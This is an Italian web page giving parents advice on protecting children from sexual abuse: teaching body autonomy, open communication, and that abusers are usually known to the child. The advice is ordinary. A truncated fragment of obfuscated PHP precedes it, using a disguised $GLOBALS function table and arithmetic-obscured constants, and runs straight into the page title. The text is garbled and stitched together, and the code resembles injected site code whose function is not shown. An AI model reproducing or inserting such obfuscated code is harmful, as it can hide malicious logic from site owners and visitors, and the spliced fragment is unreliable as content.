=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) La protezione dall’abuso sessuale

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.
La protezione dall’abuso sessuale PDF 

ultima revisione febbraio 2014 - Mentesana

 

La protezione dall’abuso sessuale: consigli per i genitori

 

  1. fornisci a tuo figlio un’adeguata educazione sessuale e insegnagli che le parti intime non devono essere mostrate e/o toccate da nessuno;
  2. insegna a tuo figlio che richieste sessuali da parte di un adulto sono sbagliate e punibili per legge;
  3. insegna a tuo figlio che il suo corpo è di sua proprietà e che ha diritto di negare un abbraccio od un contatto a chiunque, qualora ciò sia per lui fonte di disagio;
  4. non è necessario esortare tuo figlio a baciare e abbracciare parenti e amici. Lascia che manifesti il proprio affetto a modo suo;
  5. impara a comunicare bene con tuo figlio e fa in modo che ti racconti le sue esperienze. Spiegagli l’importanza di rivelare a te o ad un altro adulto di fiducia le esperienze più negative;
  6. fa in modo di conoscere gli amici dei tuoi figli e le loro famiglie;
  7. insegna a tuo figlio che non deve accettare di entrare in auto con nessuno, senza il tuo permesso;
  8. ricorda che per l’abusatore non è necessario l’utilizzo della forza per indurre tuo figlio a sé, dato che potrebbe trattarsi di qualcuno di cui egli si fida;
  9. ricorda che la tipica frase “non parlare agli sconosciuti” non si adatta per nulla a questa situazione, visto che il più delle volte l’abusatore è una persona ben conosciuta alla vittima.
 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito